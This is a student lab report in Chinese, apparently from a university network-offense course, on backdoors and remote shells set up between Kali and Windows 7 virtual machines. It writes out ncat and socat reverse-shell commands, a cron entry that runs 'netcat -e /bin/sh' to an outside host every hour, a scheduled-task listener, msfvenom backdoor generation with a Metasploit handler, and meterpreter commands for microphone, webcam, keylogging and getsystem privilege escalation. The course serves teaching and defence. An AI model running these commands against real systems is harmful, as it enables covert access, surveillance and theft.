实验内容

1.使用netcat获取主机操作Shell,cron启动

2.使用socat获取主机操作Shell, 任务计划启动

3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

5.使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

基础问答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

  • 网站捆绑下载

(2)例举你知道的后门如何启动起来(win及linux)的方式?

  • 修改注册表,添加自启动、修改正常软件快捷方式的启动路径

(3)Meterpreter有哪些给你映像深刻的功能?

  • 夺取开启摄像头、麦克风等设备权限,读取键盘内容

(4)如何发现自己有系统有没有被安装后门?

  • 电脑安全软件扫描、查看自启项有无异常程序

实验过程

常用后门工具测试

ncat

Linux获得Windows Shell
  • 首先在查看kali虚拟机的IP地址ifconfig(这里和win的ipconfig有所区别)

  • kali使用nc指令监听端口:nc -l -p 5231
  • Windows上使用ncat.exe程序的-e选项项反向连接Kali主机的端口:ncat.exe -e cmd.exe 192.168.70.131 5231
  • kali:获得win7 Windows Shell

Windows获得Linux Shell
  • Windows:使用ipconfig指令查看本机IP:192.168.70.130

  • 使用ncat.exe程序监听本机的端口:ncat.exe -l -p 5231
  • kali:使用nc指令的-e选项反向连接Windows主机的端口:ncat 192.168.70.130 5231 -e /bin/sh
  • Windows获取kali shell

用nc传输数据
  • 在Windows下监听端口:ncat.exe -l 5231
  • kali下连接到Windows的端口:nc 192.168.70.130 5231

    之后就可以双向传输文字
用nc传输文件
  • Windows下监听端口,把收到的数据保存到wyhy.out中:ncat.exe -l 5231 > wyhy.out
  • kali下先创建wyhy.in文件,再反弹连接到Windows的端口:nc 192.168.70.130 5231 < wyhy.in

    传输成功后kali里创建的文件的内容就会在Windows同名文件中出现。



1、使用netcat获取主机操作Shell,cron启动

先在win7系统下,监听端口:ncat.exe -l -p 5231

在kali下,使用man cron查看crontab命令的帮助文档



  • crontab指令可以用于设置周期性被执行的指令。该命令从标准输入设备读取指令,并将其存放于crontab文件中,以供之后读取和执行。

crontab -e指令编辑一条定时任务



在最后一行添加18 * * * * /bin/netcat 192.168.70.131 -e /bin/sh,意思是在每个小时的第18分钟反向连接Windows主机的端口

在时间没到的时候无论你在Windows那边怎么输都是没有反应的,但是在时间到的一刻你输入的所有都会瞬间显示在频幕上


2、使用socat获取主机操作Shell, 任务计划启动

  • 在Windows系统下,打开控制面板>系统和安全>管理工具>任务计划程序>创建任务在触发器选项开始任务选项选择工作站锁定时



    在操作选项卡填入socat的路径,参数填tcp-listen:XX exec:cmd.exe,pty,stderr(XX为自己设定端口号)

创建完成后锁定Windows,然后去kali

在kali输入socat - tcp:windows IP:端口号此时可以发现已经成功获得了一个cmd shell(这里可能需要做两次,Windows初次使用socat会有弹窗提示是否允许使用网络,然而你锁了Windows啥都不知道,不成功就倒回去Windows看看吧)

3、使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

在kali中输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali IP LPORT=XXXX -f exe > 20165231_backdoor.exe生成后门

在Windows下执行ncat.exe -l 5231 > 20165231_backdoor.exe,被控主机进入接收文件模式



在kali中通过nc windows ip:XXXX < 20165230_backdoor.exe将生成的后门程序传送到Windows主机上

在kali上使用msfconsole指令进入msf控制台

设置监听模块

use exploit/multi/handler //使用监听模块,设置payload

set payload windows/meterpreter/reverse_tcp //使用和生成后门程序时相同的payload

set LHOST 192.168.70.131 //这里用的是LinuxIP,和生成后门程序时指定的IP相同

set LPORT 5231 //同样要使用相同的端口


设置完成后,执行监听exploit然后在Windows上双击之前生成的文件

此时kali上已经获得了Windows主机的连接,并且得到了远程控制的shell

4、使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

使用record_mic指令截获一段音频



使用webcam_snap指令可以使用摄像头进行拍照:



使用webcam stream指令可以使用摄像头进行录像:

使用screenshot指令可以进行截屏:

使用keyscan_start指令开始,在windows中记录下击键的过程,使用keyscan_dump指令读取击键的记录:

先使用getuid指令查看当前用户,使用getsystem指令进行提权,如图所示,提权成功

实验遇到的问题

1、使用MSF meterpreter调用摄像头时显示操作失败:1411

解决:虚拟机关联到物理机的摄像头,在VM虚拟机右下加有个U盘标志,右键连接就关联上物理机上的设备了。如果右下角没有U盘标志,那就在虚拟机设置里面添加就ok了。



实验感想

我以前一直以为只要防火墙,安全软件安好就一定不会有什么被入侵的可能。看来我还是太年轻了,我们这种初学的小米渣在win7没关防火墙情况下都能依葫芦画瓢完成渗透,若不是摄像头启动有指示灯,神不知鬼不觉都被拍了。不过对于目前的渣渣技术想要完全渗透到别人的系统里除了这些技术看来还得用上社会工程学才能得手啊。

2018-2019-2 网络对抗技术 20165231 Exp2 后门原理与实践的更多相关文章

  1. 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...

  2. 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...

  3. 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...

  4. 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...

  5. 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...

  6. 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...

  7. 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...

  8. 2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 下载免费应用的时候会有绑定木马. 浏览某些网页时会有内 ...

  9. 2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践 1.基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 下载自己不熟悉的软件时含有病毒. 网络钓鱼, ...

随机推荐

  1. C: printf参数执行顺序与前置后置自增自减的影响

    起源: 今天在了解副作用side-effect的过程中,看到了下面的网页,把我带到了由printf引起的一系列问题,纠结了一整天,勉强弄懂. 第一个代码没什么好解释的.而第二个printf(" ...

  2. python使用装饰器对文件进行读写操作'及遍历文件目录

    '''使用装饰器对文件进行读写操作''' # def check_permission(func): # '''演示嵌套函数定义及使用''' # def wrapper(*args,**kwargs) ...

  3. ArrayBlockingQueue源码分析

    ArrayBlockingQueue是一个基于数组实现的有界的阻塞队列. 属性 //底层存储元素的数组.为final说明一旦初始化,容量不可变,所以是有界的. final Object[] items ...

  4. ERP常见问题总结处理

    1. ERP系统的重量录入组件设计不合理易导致录入错误 如下图所示: 修正方法: 1. 更正数据 使用SQL语句更正数据,已经生产完成,作为单据重新录入比较麻烦 UPDATE e_wms_materi ...

  5. 开启ucosii的移植之旅

    开启ucosii的移植之旅: 4.6.1.移植和硬件平台的关系 (1)只要是cortex-m3内核内核的soc移植差异都不大. 同内核同soc的不同开发板移植差异都不大. 不同内核的开发板移植难度大, ...

  6. python中的__dict__,__getattr__,__setattr__

    python class 通过内置成员dict 存储成员信息(字典) 首先用一个简单的例子看一下dict 的用法 class A(): def __init__(self,a,b): self.a = ...

  7. 最简单的JAVA解析XML字符串方法

    引入 dom4j 包<dependency> <groupId>dom4j</groupId> <artifactId>dom4j</artifa ...

  8. Linux keepalived+nginx实现主从模式

    双机高可用方法目前分为两种: 主从模式:一台主服务器和一台从服务器,当配置了虚拟vip的主服务器发送故障时,从服务器将自动接管虚拟ip,服务将不会中断.但主服务器不出现故障的时候,从服务器永远处于浪费 ...

  9. 【BZOJ4002】[JLOI2015]有意义的字符串(数论,矩阵快速幂)

    [BZOJ4002][JLOI2015]有意义的字符串(数论,矩阵快速幂) 题面 BZOJ 洛谷 题解 发现我这种题总是做不动... 令\(A=\frac{b+\sqrt d}{2},B=\frac{ ...

  10. 构建一个maven聚合类型的横向可扩展项目

    那个时候初入java这个大家庭,学习的方向很乱.毕业后,在公司磨练了一年,总想着是该交一份答卷了,可能成绩不会很好,但求及格!那么考试题目呢,我计划搭建一个横向可扩展的项目,可以在平台自扩展各种子项目 ...